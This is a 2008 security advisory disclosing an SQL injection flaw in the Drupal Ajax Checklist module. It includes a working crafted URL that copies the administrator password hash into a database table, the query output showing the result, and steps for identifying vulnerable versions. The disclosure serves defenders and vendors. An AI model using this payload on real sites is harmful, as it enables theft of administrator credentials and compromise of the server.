drupalajax-sql.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Drupal Ajax Checklist Module SQL Injection Vulnerability  
  
* Discovery Date: Sept 15, 2008  
* Security risk: high  
* Exploitable from: Remote  
* Vulnerability: SQL Injection  
* Discovered by: Justin C. Klein Keane <[email protected]>  
  
Description  
  
Drupal (http://drupal.org) is a robust content management system (CMS)  
that provides extensibility through hundreds of third party modules.  
While the security of Drupal core modules is vetted by a central  
security team, third party modules are not reviewed for security.  
  
The Ajax Checklist module (http://drupal.org/project/ajax_checklist),  
created by AsciiKewl (http://drupal.org/user/147292) is designed to  
allow users to input dynamic checklists into nodes. These checklists can  
then be checked or unchecked with state tracked via AJAX calls to pages  
that store the state in the database. Due to poor input validation on  
the AJAX handling pages, this module is vulnerable to SQL injection  
attacks. Depending on configuration, these attacks could be carried out  
by remote unauthenticated users. Due to it's data driven design, SQL  
injection attacks pose a critical threat to Drupal installations and  
their hosts and could lead to full control over the webserver process.  
  
The critical flaw exists within the ajax_checklist_save() function  
(lines 61-84 of ajax_checklist.module). This function accepts three  
parameters ($nid,$qid, and $state), all of which can be manipulated via  
a properly crafted URL. These parameters are then used to craft SQL  
select, insert, and update statements without first being sanitized.  
Vulnerable Versions  
  
5.x-1.0 dated 1007-Aug-18 was tested and shown vulnerable  
Testing for Vulnerability  
  
Calling the URL:  
  
http://sitename.tld/ajaxchecklist/save/1/2%27,2),(3,3,(select%20pass%20from%20users%20where%20uid=1),3),(4,4,%274/3/4  
  
will cause the administrator password to be inserted into the  
ajax_checkbox table in the Drupal database:  
  
mysql> select * from ajax_checklist;  
+-----+------+----------------------------------+-------+  
| nid | user | qid | state |  
+-----+------+----------------------------------+-------+  
| 1 | 0 | 2 | 2 |  
| 3 | 3 | 4202b5f87a68583e20aae6917c8c33d1 | 3 |  
| 4 | 4 | 4 | 3 |  
+-----+------+----------------------------------+-------+  
  
Impact  
  
Highly critical. Depending on configuration, this vulnerability could  
allow attackers to compromise the Drupal administrator account, an  
attack that can lead to web server and even host compromise since the  
administrator can configure file uploads and alter any content on the  
Drupal installation.  
  
Determining Version  
  
The ajax_checklist.info page for vulnerable versions displays the  
following information:  
  
; $Id: ajax_checklist.info,v 1.1 2007/08/16 06:39:34 asciikewl Exp $  
name = Ajax Checklist  
description = Creates filter-driven checklists with ajax updating to the  
database  
package = Other  
version = 5.x-0.1  
  
; Information added by drupal.org packaging script on 2007-08-18  
version = "5.x-1.0"  
project = "ajax_checklist"  
datestamp = "1187416501"  
  
Determining version information on Drupal sites is trivial in many cases  
(ref http://www.madirish.net/?article=214).  
  
Vendor Response  
  
Drupal security team contacted September 17, 2008. A security patch and  
announcement should be available Wednesday September 24, 2008.  
  
- --  
  
Justin C. Klein Keane  
http://www.MadIrish.net  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org  
  
iPwEAQECAAYFAkjakiMACgkQkSlsbLsN1gAHqgb8Cn+KHQOHCJqZXhtd1Nuhhjjl  
aE2q0njdi9KX+zjNKPEqXhvY6BJNkj6ql0rea7acsxW3d+/0+eDlMQ1Y76nCznOk  
zBk1KU/6XymZ2xtvkxpxpAE1gaVbVtjeijuqAYkonQps8qdm6ZSV5UQpadjcxyFW  
4UXmhXa0lithie8nR8P7Hej6BiqeGMQLr+kHPFK0JdvtfW6sFziXXbzNzGNgTjFV  
51S/qbb8K5q1EwMs23JXHu5tFWEZWmgFBPn8dva+uxYQDxO80nSovuh+itqzO9jz  
8pCjulvjPEO8xg8PE4Q=  
=/d0S  
-----END PGP SIGNATURE-----  
`